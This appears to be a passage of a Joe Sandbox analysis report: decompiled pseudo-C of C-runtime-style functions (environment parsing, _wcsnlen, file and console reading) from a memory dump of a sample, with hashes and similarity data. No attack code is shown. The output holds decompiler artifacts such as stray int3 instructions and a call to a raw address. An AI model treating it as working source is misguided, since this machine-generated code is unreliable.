                                                          				void* _t35;
                                                          				signed short* _t49;
                                                          				signed int _t50;
                                                          				signed short* _t53;
                                                          				signed short* _t56;
                                                          				void* _t60;
                                                          
                                                          				_t47 = __edx;
                                                          				if(_a4 != 0) {
                                                          					_push(_a24);
                                                          					_push(_a20);
                                                          					_push(_a16);
                                                          					_push(_a12);
                                                          					_push(_a8);
                                                          					_t14 = E009AEB49(__ebx, __edx);
                                                          					asm("int3");
                                                          					_push(__ebx);
                                                          					_push(__esi);
                                                          					_t53 =  *0x9cf1e4; // 0x0
                                                          					_t32 = 0;
                                                          					_push(__edi);
                                                          					_t49 = 0;
                                                          					if(_t53 != 0) {
                                                          						while(1) {
                                                          							_t15 =  *_t53 & 0x0000ffff;
                                                          							_t35 = 0x3d;
                                                          							if(_t15 == 0) {
                                                          								break;
                                                          							}
                                                          							if(_t15 != _t35) {
                                                          								_t49 = _t49 + 1;
                                                          							}
                                                          							_t53 =  &(( &(_t53[E009B5609(_t53)]))[1]);
                                                          						}
                                                          						_t9 = _t49 + 1; // 0x1
                                                          						_t14 = E009B2280(_t9, 4);
                                                          						_t50 = _t14;
                                                          						 *0x9cf20c = _t50;
                                                          						if(_t50 == 0) {
                                                          							goto L4;
                                                          						} else {
                                                          							_t56 =  *0x9cf1e4; // 0x0
                                                          							if( *_t56 == _t32) {
                                                          								L17:
                                                          								E009B2248(_t56);
                                                          								 *0x9cf1e4 = _t32;
                                                          								_t18 = 0;
                                                          								 *_t50 = _t32;
                                                          								 *0x9d0118 = 1;
                                                          								goto L18;
                                                          							} else {
                                                          								do {
                                                          									_t20 = E009B5609(_t56);
                                                          									_t10 = _t20 + 1; // 0x1
                                                          									_t34 = _t10;
                                                          									_t21 = 0x3d;
                                                          									if( *_t56 == _t21) {
                                                          										goto L15;
                                                          									} else {
                                                          										_t22 = E009B2280(_t34, 2);
                                                          										 *_t50 = _t22;
                                                          										if(_t22 == 0) {
                                                          											_t23 = E009B2248( *0x9cf20c);
                                                          											 *0x9cf20c =  *0x9cf20c & 0x00000000;
                                                          											_t18 = _t23 | 0xffffffff;
                                                          											L18:
                                                          											goto L19;
                                                          										} else {
                                                          											_t24 = E009B55AD(_t22, _t34, _t56);
                                                          											_t60 = _t60 + 0xc;
                                                          											if(_t24 != 0) {
                                                          												_push(0);
                                                          												_push(0);
                                                          												_push(0);
                                                          												_push(0);
                                                          												_push(0);
                                                          												E009AEB49(_t34, _t47);
                                                          												asm("int3");
                                                          												if(E009B15DF(3) == 1) {
                                                          													L25:
                                                          													E009B1415(_t34, _t47, _t50, _t56, 0xfc);
                                                          													return E009B1415(_t34, _t47, _t50, _t56, 0xff);
                                                          												}
                                                          												_t30 = E009B15DF(3);
                                                          												if(_t30 == 0 &&  *0x9cf540 == 1) {
                                                          													goto L25;
                                                          												}
                                                          												return _t30;
                                                          											} else {
                                                          												_t50 = _t50 + 4;
                                                          												goto L15;
                                                          											}
                                                          										}
                                                          									}
                                                          									goto L27;
                                                          									L15:
                                                          									_t56 =  &(_t56[_t34]);
                                                          									_t32 = 0;
                                                          								} while ( *_t56 != 0);
                                                          								_t56 =  *0x9cf1e4; // 0x0
                                                          								goto L17;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						L4:
                                                          						_t18 = _t14 | 0xffffffff;
                                                          						L19:
                                                          						return _t18;
                                                          					}
                                                          				} else {
                                                          					return __eax;
                                                          				}
                                                          				L27:
                                                          			}





















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __invoke_watson
                                                          • String ID:
                                                          • API String ID: 3648217671-0
                                                          • Opcode ID: 3269c9cf6f8446e023501b7c01c76f99297c0d2a5859649f39cf93f39aa54e11
                                                          • Instruction ID: 244d3da62b2419ffec7f2b83562d9ddaa1875d9bfdd12cecff67f453c29b3a35
                                                          • Opcode Fuzzy Hash: 3269c9cf6f8446e023501b7c01c76f99297c0d2a5859649f39cf93f39aa54e11
                                                          • Instruction Fuzzy Hash: E9212B77814202DFDB246FA0ED55BE673EEEF40370FA4442AF520D7490E73599409790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 62%
                                                          			E009B721D(void* __ebx, void* __edi, void* __fp0, intOrPtr _a4) {
                                                          				char* _v24;
                                                          				intOrPtr _v28;
                                                          				signed int _v36;
                                                          				signed int _v40;
                                                          				short _v300;
                                                          				void* __esi;
                                                          				void* _t15;
                                                          				void* _t17;
                                                          				signed int _t20;
                                                          				char* _t22;
                                                          				signed int _t30;
                                                          				void* _t40;
                                                          				void* _t42;
                                                          				void* _t46;
                                                          				void* _t47;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				signed int _t52;
                                                          
                                                          				if(_a4 != 0) {
                                                          					_push(__ebx);
                                                          					_t30 = E009BDBB1(_a4, 0x55);
                                                          					if(_t30 < 0x55) {
                                                          						_push(__edi);
                                                          						_t15 = E009B22C8(_t40, 2 + _t30 * 2);
                                                          						_t42 = _t15;
                                                          						if(_t42 != 0) {
                                                          							_t5 = _t30 + 1; // 0x1
                                                          							_t17 = E009B5727(_t42, _t5, _a4, _t5);
                                                          							_t52 = _t51 + 0x10;
                                                          							if(_t17 != 0) {
                                                          								_push(0);
                                                          								_push(0);
                                                          								_push(0);
                                                          								_push(0);
                                                          								_push(0);
                                                          								E009AEB49(_t30, _t40);
                                                          								asm("int3");
                                                          								_t49 = _t47;
                                                          								_push(_t49);
                                                          								_t50 = _t52;
                                                          								_t20 =  *0x9ce400; // 0xff4e2c36
                                                          								_v40 = _t20 ^ _t52;
                                                          								_t22 = _v24;
                                                          								_t45 = _v28;
                                                          								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
                                                          									E009B7973(_t30, _t40, __fp0, _t45,  &_v300);
                                                          								}
                                                          								_pop(_t46);
                                                          								return E009B1E0D(_t30, _v36 ^ _t50, _t40, _t42, _t46);
                                                          							} else {
                                                          								_t15 = _t42;
                                                          								goto L5;
                                                          							}
                                                          						} else {
                                                          							L5:
                                                          							goto L6;
                                                          						}
                                                          					} else {
                                                          						_t15 = 0;
                                                          						L6:
                                                          						return _t15;
                                                          					}
                                                          				} else {
                                                          					return 0;
                                                          				}
                                                          			}






















                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _wcsnlen
                                                          • String ID: U
                                                          • API String ID: 3628947076-3372436214
                                                          • Opcode ID: ce5045e638527aa8e080ac56f3bdf6bf36d966680e1b1d17e648b86f3552a25c
                                                          • Instruction ID: 73efd427173ec298428934771baec82c7c632a7b1cd68bab81f4b1dadacd6e9b
                                                          • Opcode Fuzzy Hash: ce5045e638527aa8e080ac56f3bdf6bf36d966680e1b1d17e648b86f3552a25c
                                                          • Instruction Fuzzy Hash: 5421EB3160C1087EEB109AE49E46FFAB3ACDBC5770F504665F918C6190FA61DE008690
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E009A28A2(signed int __ebx, signed int __ecx, signed int __esi) {
                                                          				signed char _t247;
                                                          				signed int _t250;
                                                          				signed int _t251;
                                                          				signed int _t252;
                                                          				intOrPtr _t253;
                                                          				void* _t254;
                                                          				void* _t255;
                                                          				signed int _t256;
                                                          				signed int _t258;
                                                          				long _t259;
                                                          				char* _t261;
                                                          				signed char _t265;
                                                          				signed char _t266;
                                                          				signed int _t267;
                                                          				signed int _t268;
                                                          				signed char _t269;
                                                          				signed int _t277;
                                                          				intOrPtr _t278;
                                                          				void* _t280;
                                                          				void* _t281;
                                                          				void* _t282;
                                                          				void* _t283;
                                                          				signed int _t287;
                                                          				void* _t288;
                                                          				signed int _t291;
                                                          				signed int _t292;
                                                          				intOrPtr _t294;
                                                          				void* _t296;
                                                          				signed char _t297;
                                                          				signed int _t298;
                                                          				signed char _t299;
                                                          				signed int _t300;
                                                          				signed int _t302;
                                                          				signed int _t313;
                                                          				char _t314;
                                                          				char _t315;
                                                          				signed int _t317;
                                                          				void* _t318;
                                                          				signed char _t319;
                                                          				signed int _t327;
                                                          				intOrPtr _t328;
                                                          				void* _t330;
                                                          				void* _t331;
                                                          				void* _t332;
                                                          				signed int _t334;
                                                          				signed int _t335;
                                                          				void* _t336;
                                                          				long _t338;
                                                          				void _t346;
                                                          				void _t349;
                                                          				signed int _t355;
                                                          				signed int _t357;
                                                          				char* _t358;
                                                          				signed int _t359;
                                                          				void* _t360;
                                                          				intOrPtr _t362;
                                                          				signed int _t363;
                                                          				signed int _t368;
                                                          				long _t369;
                                                          				void* _t370;
                                                          				intOrPtr _t371;
                                                          				char _t374;
                                                          				signed int _t376;
                                                          				void* _t377;
                                                          				intOrPtr _t378;
                                                          				signed int _t380;
                                                          				void* _t383;
                                                          				intOrPtr _t384;
                                                          				intOrPtr _t387;
                                                          				char _t388;
                                                          				intOrPtr _t389;
                                                          				intOrPtr _t390;
                                                          				signed int _t391;
                                                          				void* _t392;
                                                          				void* _t393;
                                                          				void* _t394;
                                                          				signed int _t396;
                                                          				void _t399;
                                                          				void* _t400;
                                                          				void* _t401;
                                                          				signed int _t403;
                                                          				signed short* _t406;
                                                          				signed int _t407;
                                                          				void* _t410;
                                                          				char* _t412;
                                                          				signed int _t413;
                                                          				signed int _t417;
                                                          				intOrPtr _t418;
                                                          				signed int _t419;
                                                          				signed int _t420;
                                                          				signed int _t421;
                                                          				signed char* _t422;
                                                          				int _t423;
                                                          				signed int _t424;
                                                          				void* _t426;
                                                          				void* _t428;
                                                          
                                                          				_t415 = __esi;
                                                          				_t359 = __ecx;
                                                          				_t355 = __ebx;
                                                          				 *((char*)(_t426 + 0x13)) = 0x8100009a;
                                                          				if(0xffffffff81000099 == 0) {
                                                          					_t247 =  !__esi;
                                                          					__eflags = _t247 & 0x00000001;
                                                          					if((_t247 & 0x00000001) == 0) {
                                                          						goto L2;
                                                          					} else {
                                                          						_t415 = __esi >> 1;
                                                          						__eflags = _t415 - 4;
                                                          						if(_t415 < 4) {
                                                          							_t415 = 4;
                                                          						}
                                                          						_t252 = E009B22C8(_t389, _t415);
                                                          						 *(_t426 - 0x10) = _t252;
                                                          						_pop(_t360);
                                                          						__eflags = _t252;
                                                          						if(__eflags != 0) {
                                                          							_t253 = E009B3F56(_t360, __eflags,  *((intOrPtr*)(_t426 + 8)), 0, 0, 1);
                                                          							_t428 = _t428 + 0x10;
                                                          							_t362 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
                                                          							 *((intOrPtr*)(_t362 + _t355 + 0x28)) = _t253;
                                                          							_t254 =  *(_t426 - 0x10);
                                                          							 *((intOrPtr*)(_t362 + _t355 + 0x2c)) = _t389;
                                                          							_t359 =  *(_t426 - 0xc);
                                                          							goto L14;
                                                          						} else {
                                                          							 *((intOrPtr*)(E009AF100())) = 0xc;
                                                          							_t250 = E009AF0CC();
                                                          							 *_t250 = 8;
                                                          							goto L162;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					if(0xffffffff81000098 != 0) {
                                                          						L7:
                                                          						_t254 =  *(_t426 + 0xc);
                                                          						 *(_t426 - 0x10) = _t254;
                                                          						L14:
                                                          						_t390 =  *((intOrPtr*)(0x9cf230 + _t359 * 4));
                                                          						_t363 =  *(_t426 - 0xc);
                                                          						 *(_t426 - 0x1c) = _t254;
                                                          						if(( *(_t390 + _t355 + 4) & 0x00000048) != 0) {
                                                          							_t399 =  *((intOrPtr*)(_t390 + _t355 + 5));
                                                          							if(_t399 != 0xa && _t415 != 0) {
                                                          								 *_t254 = _t399;
                                                          								_t29 = _t254 + 1; // 0x9b2b48
                                                          								_t400 = _t29;
                                                          								_t403 = 1;
                                                          								_t415 = _t415 - 1;
                                                          								 *(_t426 - 0x1c) = _t400;
                                                          								 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 5)) = 0xa;
                                                          								if( *((char*)(_t426 + 0x13)) != 0) {
                                                          									_t39 = _t355 + 0x25; // 0x45c60975
                                                          									_t346 =  *((intOrPtr*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t39));
                                                          									if(_t346 != 0xa && _t415 != 0) {
                                                          										 *_t400 = _t346;
                                                          										_t401 = _t400 + 1;
                                                          										_t415 = _t415 - 1;
                                                          										 *(_t426 - 0x1c) = _t401;
                                                          										_t403 = 2;
                                                          										 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x25)) = 0xa;
                                                          										if( *((char*)(_t426 + 0x13)) == 1) {
                                                          											_t349 =  *((intOrPtr*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x26));
                                                          											if(_t349 != 0xa && _t415 != 0) {
                                                          												 *_t401 = _t349;
                                                          												_t415 = _t415 - 1;
                                                          												_t403 = 3;
                                                          												_t388 = 0xa;
                                                          												 *(_t426 - 0x1c) = _t401 + 1;
                                                          												 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x26)) = _t388;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						_t255 = E009B3924( *((intOrPtr*)(_t426 + 8)));
                                                          						_t256 =  *(_t426 - 0xc);
                                                          						if(_t255 == 0) {
                                                          							L35:
                                                          							_t258 = ReadFile( *( *((intOrPtr*)(0x9cf230 + _t256 * 4)) + _t355),  *(_t426 - 0x1c), _t415, _t426 - 0x14, 0); // executed
                                                          							__eflags = _t258;
                                                          							if(_t258 == 0) {
                                                          								L157:
                                                          								_t259 = GetLastError();
                                                          								_t417 = 5;
                                                          								__eflags = _t259 - _t417;
                                                          								if(_t259 != _t417) {
                                                          									__eflags = _t259 - 0x6d;
                                                          									if(_t259 != 0x6d) {
                                                          										goto L30;
                                                          									}
                                                          									_t357 = 0;
                                                          									goto L32;
                                                          								}
                                                          								 *((intOrPtr*)(E009AF100())) = 9;
                                                          								 *(E009AF0CC()) = _t417;
                                                          								goto L31;
                                                          							}
                                                          							_t368 =  *(_t426 - 0x14);
                                                          							__eflags = _t368;
                                                          							if(_t368 < 0) {
                                                          								goto L157;
                                                          							}
                                                          							__eflags = _t368 - _t415;
                                                          							if(_t368 > _t415) {
                                                          								goto L157;
                                                          							}
                                                          							goto L38;
                                                          						} else {
                                                          							_t387 =  *((intOrPtr*)(0x9cf230 + _t256 * 4));
                                                          							if(( *(_t387 + _t355 + 4) & 0x00000080) == 0) {
                                                          								goto L35;
                                                          							}
                                                          							_t338 = GetConsoleMode( *(_t387 + _t355), _t426 - 0x20);
                                                          							 *(_t426 - 0x20) = _t338;
                                                          							if(_t338 == 0 ||  *((char*)(_t426 + 0x13)) != 2) {
                                                          								_t256 =  *(_t426 - 0xc);
                                                          								goto L35;
                                                          							} else {
                                                          								if(ReadConsoleW( *( *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4)) + _t355),  *(_t426 - 0x1c), _t415 >> 1, _t426 - 0x14, 0) != 0) {
                                                          									_t368 =  *(_t426 - 0x14) +  *(_t426 - 0x14);
                                                          									 *(_t426 - 0x14) = _t368;
                                                          									L38:
                                                          									_t391 =  *(_t426 - 0xc);
                                                          									_t403 = _t403 + _t368;
                                                          									_t418 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
                                                          									_t88 = _t355 + 4; // 0x840ffff8
                                                          									_t265 =  *((intOrPtr*)(_t418 + _t88));
                                                          									__eflags = _t265;
                                                          									if(_t265 >= 0) {
                                                          										L98:
                                                          										_t261 =  *(_t426 - 0x10);
                                                          										L99:
                                                          										_t357 =  *(_t426 - 0x18);
                                                          										0x74a7428b();
                                                          										L101:
                                                          										if(_t261 !=  *(_t426 + 0xc)) {
                                                          											E009B2248(_t261);
                                                          										}
                                                          										if(_t357 != 0xfffffffe) {
                                                          											_t403 = _t357;
                                                          										}
                                                          										_t251 = _t403;
                                                          										L163:
                                                          										return _t251;
                                                          									}
                                                          									__eflags =  *((char*)(_t426 + 0x13)) - 2;
                                                          									if( *((char*)(_t426 + 0x13)) == 2) {
                                                          										__eflags =  *(_t426 - 0x20);
                                                          										if( *(_t426 - 0x20) == 0) {
                                                          											__eflags = _t368;
                                                          											if(_t368 == 0) {
                                                          												L124:
                                                          												_t266 = _t265 & 0x000000fb;
                                                          												__eflags = _t266;
                                                          												L125:
                                                          												 *(_t418 + _t355 + 4) = _t266;
                                                          												_t267 =  *(_t426 - 0x10);
                                                          												_t419 = _t267;
                                                          												 *(_t426 - 0x28) = _t267;
                                                          												_t369 = _t267 + _t403;
                                                          												 *(_t426 - 0x20) = _t369;
                                                          												__eflags = _t267 - _t369;
                                                          												if(_t267 >= _t369) {
                                                          													L156:
                                                          													_t261 =  *(_t426 - 0x10);
                                                          													_t403 = _t419 - _t261;
                                                          													goto L99;
                                                          												}
                                                          												_t370 = 0xd;
                                                          												 *((intOrPtr*)(_t426 + 0x10)) = 0x1a;
                                                          												_t406 = _t267;
                                                          												while(1) {
                                                          													_t268 =  *_t406 & 0x0000ffff;
                                                          													__eflags = _t268 -  *((intOrPtr*)(_t426 + 0x10));
                                                          													if(_t268 ==  *((intOrPtr*)(_t426 + 0x10))) {
                                                          														break;
                                                          													}
                                                          													__eflags = _t268 - _t370;
                                                          													if(_t268 == _t370) {
                                                          														__eflags = _t406 -  *(_t426 - 0x20) + 0xfffffffe;
                                                          														if(_t406 >=  *(_t426 - 0x20) + 0xfffffffe) {
                                                          															_t406 =  &(_t406[1]);
                                                          															_t277 = ReadFile( *( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355), _t426 - 8, 2, _t426 - 0x14, 0);
                                                          															__eflags = _t277;
                                                          															if(_t277 != 0) {
                                                          																L137:
                                                          																__eflags =  *(_t426 - 0x14);
                                                          																if( *(_t426 - 0x14) == 0) {
                                                          																	L152:
                                                          																	_t391 =  *(_t426 - 0xc);
                                                          																	_t370 = 0xd;
                                                          																	 *_t419 = _t370;
                                                          																	_t419 = _t419 + 2;
                                                          																	L144:
                                                          																	__eflags = _t406 -  *(_t426 - 0x20);
                                                          																	if(_t406 <  *(_t426 - 0x20)) {
                                                          																		continue;
                                                          																	}
                                                          																	goto L156;
                                                          																}
                                                          																_t391 =  *(_t426 - 0xc);
                                                          																_t278 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
                                                          																__eflags =  *(_t278 + _t355 + 4) & 0x00000048;
                                                          																if(( *(_t278 + _t355 + 4) & 0x00000048) == 0) {
                                                          																	__eflags = _t419 -  *(_t426 - 0x10);
                                                          																	if(__eflags != 0) {
                                                          																		L149:
                                                          																		E009B3F56(_t370, __eflags,  *((intOrPtr*)(_t426 + 8)), 0xfffffffe, 0xffffffff, 1);
                                                          																		_t391 =  *(_t426 - 0xc);
                                                          																		_t428 = _t428 + 0x10;
                                                          																		_t280 = 0xa;
                                                          																		__eflags =  *(_t426 - 8) - _t280;
                                                          																		if( *(_t426 - 8) == _t280) {
                                                          																			L142:
                                                          																			_push(0xd);
                                                          																			L143:
                                                          																			_pop(_t370);
                                                          																			goto L144;
                                                          																		}
                                                          																		_t370 = 0xd;
                                                          																		 *_t419 = _t370;
                                                          																		L151:
                                                          																		_t419 = _t419 + 2;
                                                          																		goto L144;
                                                          																	}
                                                          																	_t281 = 0xa;
                                                          																	__eflags =  *(_t426 - 8) - _t281;
                                                          																	if(__eflags != 0) {
                                                          																		goto L149;
                                                          																	}
                                                          																	 *_t419 = _t281;
                                                          																	_t419 = _t419 + 2;
                                                          																	goto L142;
                                                          																}
                                                          																_t282 = 0xa;
                                                          																_push(0xd);
                                                          																__eflags =  *(_t426 - 8) - _t282;
                                                          																if( *(_t426 - 8) != _t282) {
                                                          																	_pop(_t283);
                                                          																	 *_t419 = _t283;
                                                          																	_t419 = _t419 + 2;
                                                          																	__eflags = _t419;
                                                          																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 5)) =  *(_t426 - 8);
                                                          																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 0x25)) =  *((intOrPtr*)(_t426 - 7));
                                                          																	_t374 = 0xa;
                                                          																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 0x26)) = _t374;
                                                          																	goto L142;
                                                          																}
                                                          																 *_t419 = _t282;
                                                          																_t419 = _t419 + 2;
                                                          																goto L143;
                                                          															}
                                                          															_t287 = GetLastError();
                                                          															__eflags = _t287;
                                                          															if(_t287 != 0) {
                                                          																goto L152;
                                                          															}
                                                          															goto L137;
                                                          														}
                                                          														_t392 = 0xa;
                                                          														__eflags = _t406[1] - _t392;
                                                          														_t391 =  *(_t426 - 0xc);
                                                          														if(_t406[1] != _t392) {
                                                          															 *_t419 = _t370;
                                                          															L134:
                                                          															_t419 = _t419 + 2;
                                                          															_t406 =  &(_t406[1]);
                                                          															goto L144;
                                                          														}
                                                          														_t288 = 0xa;
                                                          														_t406 =  &(_t406[2]);
                                                          														 *_t419 = _t288;
                                                          														goto L151;
                                                          													}
                                                          													 *_t419 = _t268;
                                                          													goto L134;
                                                          												}
                                                          												_t371 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
                                                          												_t269 =  *(_t371 + _t355 + 4);
                                                          												__eflags = _t269 & 0x00000040;
                                                          												if((_t269 & 0x00000040) != 0) {
                                                          													 *_t419 =  *_t406;
                                                          													_t419 = _t419 + 2;
                                                          													__eflags = _t419;
                                                          												} else {
                                                          													 *(_t371 + _t355 + 4) = _t269 | 0x00000002;
                                                          												}
                                                          												goto L156;
                                                          											}
                                                          											_t393 = 0xa;
                                                          											__eflags =  *( *(_t426 - 0x10)) - _t393;
                                                          											_t391 =  *(_t426 - 0xc);
                                                          											if( *( *(_t426 - 0x10)) != _t393) {
                                                          												goto L124;
                                                          											}
                                                          											_t266 = _t265 | 0x00000004;
                                                          											goto L125;
                                                          										}
                                                          										_t420 =  *(_t426 - 0x10);
                                                          										asm("cdq");
                                                          										_t407 = _t420;
                                                          										_t376 = _t420;
                                                          										_t291 = _t403 - _t391 >> 1;
                                                          										_t394 = _t407 + _t291 * 2;
                                                          										__eflags = _t407 - _t394;
                                                          										if(_t407 >= _t394) {
                                                          											L120:
                                                          											_t261 =  *(_t426 - 0x10);
                                                          											_t403 = _t420 - _t261 & 0xfffffffe;
                                                          											goto L99;
                                                          										}
                                                          										 *((intOrPtr*)(_t426 + 0x10)) = 0x1a;
                                                          										asm("sbb al, [eax]");
                                                          										 *_t291 =  *_t291 + _t291;
                                                          										__eflags =  *_t291;
                                                          										_t410 = 0xd;
                                                          										while(1) {
                                                          											_t292 =  *_t376 & 0x0000ffff;
                                                          											__eflags = _t292 -  *((intOrPtr*)(_t426 + 0x10));
                                                          											if(_t292 ==  *((intOrPtr*)(_t426 + 0x10))) {
                                                          												break;
                                                          											}
                                                          											__eflags = _t292 - _t410;
                                                          											if(_t292 == _t410) {
                                                          												__eflags = _t376 - _t394 - 2;
                                                          												if(_t376 < _t394 - 2) {
                                                          													_t376 = _t376 + 2;
                                                          													_t296 = 0xa;
                                                          													__eflags =  *_t376 - _t296;
                                                          													if( *_t376 != _t296) {
                                                          														_t296 = 0xd;
                                                          														_t410 = _t296;
                                                          													}
                                                          													 *_t420 = _t296;
                                                          													_t420 = _t420 + 2;
                                                          													__eflags = _t420;
                                                          												}
                                                          											} else {
                                                          												 *_t420 = _t292;
                                                          												_t420 = _t420 + 2;
                                                          												_t376 = _t376 + 2;
                                                          											}
                                                          											__eflags = _t376 - _t394;
                                                          											if(_t376 < _t394) {
                                                          												continue;
                                                          											} else {
                                                          												goto L120;
                                                          											}
                                                          										}
                                                          										_t294 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
                                                          										_t181 = _t294 + _t355 + 4;
                                                          										 *_t181 =  *(_t294 + _t355 + 4) | 0x00000002;
                                                          										__eflags =  *_t181;
                                                          										goto L120;
                                                          									}
                                                          									__eflags = _t368;
                                                          									if(_t368 == 0) {
                                                          										L43:
                                                          										_t297 = _t265 & 0x000000fb;
                                                          										__eflags = _t297;
                                                          										L44:
                                                          										 *(_t418 + _t355 + 4) = _t297;
                                                          										_t298 =  *(_t426 - 0x10);
                                                          										_t421 = _t298;
                                                          										 *(_t426 - 0x20) = _t298;
                                                          										_t377 = _t298 + _t403;
                                                          										 *(_t426 - 0x1c) = _t377;
                                                          										__eflags = _t298 - _t377;
                                                          										if(_t298 >= _t377) {
                                                          											L75:
                                                          											_t261 =  *(_t426 - 0x10);
                                                          											_t403 = _t421 - _t261;
                                                          											__eflags =  *((char*)(_t426 + 0x13)) - 1;
                                                          											if( *((char*)(_t426 + 0x13)) != 1) {
                                                          												goto L99;
                                                          											}
                                                          											__eflags = _t403;
                                                          											if(_t403 == 0) {
                                                          												goto L99;
                                                          											}
                                                          											_t422 = _t421 - 1;
                                                          											_t299 =  *_t422;
                                                          											__eflags = _t299;
                                                          											if(_t299 < 0) {
                                                          												_t300 = _t299 & 0x000000ff;
                                                          												_t396 = 1;
                                                          												__eflags =  *((char*)(_t300 + 0x9ce408));
                                                          												if( *((char*)(_t300 + 0x9ce408)) != 0) {
                                                          													L85:
                                                          													_t302 =  *((char*)(( *_t422 & 0x000000ff) + 0x9ce408));
                                                          													__eflags = _t302;
                                                          													if(_t302 != 0) {
                                                          														__eflags = _t302 + 1 - _t396;
                                                          														if(_t302 + 1 != _t396) {
                                                          															_t378 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
                                                          															__eflags =  *(_t378 + _t355 + 4) & 0x00000048;
                                                          															if(__eflags == 0) {
                                                          																asm("cdq");
                                                          																E009B3F56(_t378, __eflags,  *((intOrPtr*)(_t426 + 8)),  ~_t396,  ~_t396, 1);
                                                          															} else {
                                                          																_t424 =  &(_t422[1]);
                                                          																 *((char*)(_t378 + _t355 + 5)) =  *_t422;
                                                          																_t313 =  *(_t426 - 0xc);
                                                          																__eflags = _t396 - 2;
                                                          																if(_t396 >= 2) {
                                                          																	_t315 =  *_t424;
                                                          																	_t424 = _t424 + 1;
                                                          																	__eflags = _t424;
                                                          																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t313 * 4)) + _t355 + 0x25)) = _t315;
                                                          																	_t313 =  *(_t426 - 0xc);
                                                          																}
                                                          																__eflags = _t396 - 3;
                                                          																if(_t396 == 3) {
                                                          																	_t314 =  *_t424;
                                                          																	_t424 = _t424 + 1;
                                                          																	__eflags = _t424;
                                                          																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t313 * 4)) + _t355 + 0x26)) = _t314;
                                                          																}
                                                          																_t422 = _t424 - _t396;
                                                          															}
                                                          														} else {
                                                          															_t422 =  &(_t422[_t396]);
                                                          														}
                                                          														L96:
                                                          														_t412 =  *(_t426 - 0x10);
                                                          														_t423 = _t422 - _t412;
                                                          														_t403 = MultiByteToWideChar(0xfde9, 0, _t412, _t423,  *(_t426 + 0xc),  *(_t426 - 0x28) >> 1);
                                                          														__eflags = _t403;
                                                          														if(_t403 == 0) {
                                                          															goto L29;
                                                          														}
                                                          														__eflags = _t403 - _t423;
                                                          														_t380 = 0 | _t403 != _t423;
                                                          														_t403 = _t403 + _t403;
                                                          														__eflags = _t403;
                                                          														 *( *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4)) + _t355 + 0x30) = _t380;
                                                          														goto L98;
                                                          													}
                                                          													 *((intOrPtr*)(E009AF100())) = 0x2a;
                                                          													L31:
                                                          													_t357 = _t355 | 0xffffffff;
                                                          													L32:
                                                          													_t261 =  *(_t426 - 0x10);
                                                          													goto L101;
                                                          												}
                                                          												_t358 =  *(_t426 - 0x10);
                                                          												while(1) {
                                                          													__eflags = _t396 - 4;
                                                          													if(_t396 > 4) {
                                                          														break;
                                                          													}
                                                          													__eflags = _t422 - _t358;
                                                          													if(_t422 < _t358) {
                                                          														break;
                                                          													}
                                                          													_t422 = _t422 - 1;
                                                          													_t396 = _t396 + 1;
                                                          													_t317 =  *_t422 & 0x000000ff;
                                                          													__eflags =  *((char*)(_t317 + 0x9ce408));
                                                          													if( *((char*)(_t317 + 0x9ce408)) == 0) {
                                                          														continue;
                                                          													}
                                                          													break;
                                                          												}
                                                          												_t355 =  *(_t426 - 0x24);
                                                          												goto L85;
                                                          											}
                                                          											_t422 =  &(_t422[1]);
                                                          											goto L96;
                                                          										}
                                                          										_t383 = 0xd;
                                                          										_t413 = _t298;
                                                          										while(1) {
